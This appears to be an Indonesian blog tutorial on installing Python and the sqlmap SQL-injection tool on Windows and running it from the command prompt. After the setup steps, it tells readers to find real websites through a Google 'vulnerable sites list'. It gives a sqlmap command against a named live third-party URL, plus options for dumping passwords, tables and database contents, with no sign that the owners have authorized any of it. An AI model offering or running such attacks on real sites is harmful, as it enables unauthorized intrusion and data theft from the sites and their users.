Dalam posting ini saya akan menunjukkan kepada anda bagaimana cara setup instal dan juga bagaiman cara menjalankan sqlmap di windows. Biasanya SQLMap paling sering di jalankan pada sistem operasi Linux dan sejenisnya.
SQLMap adalah tool yang paling populer untuk eksploitasi otomatis vulnerability SQL Injection dan pengambil alihan(akusisi) database. SQLMap sendiri adalah cross platform yang ditulis dalam bahasa python. Jika Anda menggunakan Backtrack ataupun kali linux maka sqlmap masuk pada paket di dalamnya..Fungsi SQLMap sendiri adalah untuk melakukan SQL Injection dan mencari kelemahan pada sistem database yang akan di serang. Langsung saja kita menuju step-step proses instalasinya.
Langkah 1 : Download Python
Download terlebih dahulu python, recomendasi saya, menggunakan Python versi 3.10.7. Bisa di download disini. Lalu instal python tinggal di klik next next saja.
Mungkin ada yang bertanya kenapa harus menginstall python, dikarenkan sqlmap ditulis dalam bahasa python, sehingga langkah pertama yang harus dilakukan adalah menginstall python .
Langkah 2 : Download SQLMAP
Selanjutnya unduh file zip sqlmap dari sqlmap.org
Langkah 3 : Ekstrak file zip sqlmap
Ekstrak file zip sqlmap kemudian simpan di folder yang gampang dicari misalnya d drive C, agar gampang dijalankan rename foldernya menjadi folder sqlmap saja.
Langkah 4 : Menjalankan sqlmap menggunakan CMD
Tekan CTRL + R, kemudian ketik cmd. Kemudian masuk ke direktori sqlmap, sql yang saya demokan ini, saya simpan di direktori C.
kemudian jalankan sqlmap.py silahkan gunakan script
python sqlmap.py
Sqlmap sudah running. tinggal di uji coba.
Jika ingin mencoba sqlmap menyerang website. silahkan cari contoh di google sqlmap vulnerable sites list
misalnya kita membuka salah satu situs sqlmap vulnerable sites list, maka kita akan dapatkan link-link yang dapat kita uji coba misalnya saya ambil salah satu website
Kemudian jalankan perintah
sqlmap.py -u http://www.bia2.com/video/player.php?id=13 --dbs
Beberapa perintah yang dapat digunakan selain dari -dbs anda juga bisa gunakan perintah :
--batch --banner --batch --passwords --batch --dbs --batch --tables -D (namadb/schema) contoh : --batch --tables -D testdb --batch --dump -T (table) -D namadb/schema contoh : --batch --dump -T (testtable) -D ntestdba
Sekian tutorial kali ini. semoga bermanfaat
0 Comments